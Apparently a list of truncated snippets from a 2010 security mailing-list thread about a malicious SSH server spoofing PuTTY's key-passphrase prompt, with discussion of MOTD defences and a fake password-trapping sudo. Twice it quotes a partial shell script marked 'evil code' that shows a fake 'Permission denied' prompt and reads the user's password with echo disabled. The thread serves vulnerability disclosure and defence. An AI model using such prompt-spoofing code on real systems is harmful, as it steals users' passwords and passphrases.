Am 02.06.2010 21:41, schrieb Joachim Schipper:
But note that someone with access to a single account could use this to
gain the password for that account, and hence possibly sudo access.
The attack, as suggested by me, is about passphrases for private keys
that should never get transmitted to
all controls like MOTD can be bypassed ...
=edited script=
# evil code
mIP=`/sbin/ifconfig | grep x.x.x | cut -d ':' -f2- | cut -d ' ' -f1`
mUn=`whoami`
mSttyVal=`stty -g`
echo -en Permission denied, please try again.\n
echo -en $...@$mip's password:
stty -echo
read password
echo -en
On Wed, Jun 02, 2010 at 01:29:40PM +0530, rapper crazy wrote:
all controls like MOTD can be bypassed ...
=edited script=
# evil code
mIP=`/sbin/ifconfig | grep x.x.x | cut -d ':' -f2- | cut -d ' ' -f1`
mUn=`whoami`
mSttyVal=`stty -g`
echo -en Permission denied, please try
... someone with access to a single account could use this to
gain the password for that account, and hence possibly sudo access.
Oh yes, someone with access to an account has... access to that.
If he wanted sudo, then just have a fake sudo: one that traps the
password and runs the real sudo
On 6/2/2010 2:58 PM, paul.sz...@sydney.edu.au wrote:
... someone with access to a single account could use this to
gain the password for that account, and hence possibly sudo access.
Oh yes, someone with access to an account has... access to that.
If he wanted sudo, then just have a fake
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Jan Schejbal wrote:
PuTTY, a SSH client for Windows, requests the passphrase to the ssh key in the
console window used for the connection. This could allow a malicious server to
gain access to a user's passphrase by spoofing that prompt
That
You should make a show about it.
On Tue, Jun 1, 2010 at 6:07 AM, Rob Fuller jd.mu...@gmail.com wrote:
Couldn't this also be thwarted by having a MOTD? It generally displays
before the bashrc if I'm not mistaken.
--
Rob Fuller | Mubix
Room362.com | Hak5.org
On Mon, May 31, 2010 at 8:47
On Jun 1, 2010, at 2:47 AM, Jan Schejbal wrote:
PuTTY, a SSH client for Windows, requests the passphrase to the ssh key in
the console window used for the connection. This could allow a malicious
server to gain access to a user's passphrase by spoofing that prompt.
We assume that the
PuTTY, a SSH client for Windows, requests the passphrase to the ssh key
in the console window used for the connection. This could allow a
malicious server to gain access to a user's passphrase by spoofing that
prompt.
We assume that the user is using key-bases ssh auth with ssh and
connects
Couldn't this also be thwarted by having a MOTD? It generally displays
before the bashrc if I'm not mistaken.
--
Rob Fuller | Mubix
Room362.com | Hak5.org
On Mon, May 31, 2010 at 8:47 PM, Jan Schejbal
jan.mailinglis...@googlemail.com wrote:
PuTTY, a SSH client for Windows, requests the
10 matches
Mail list logo
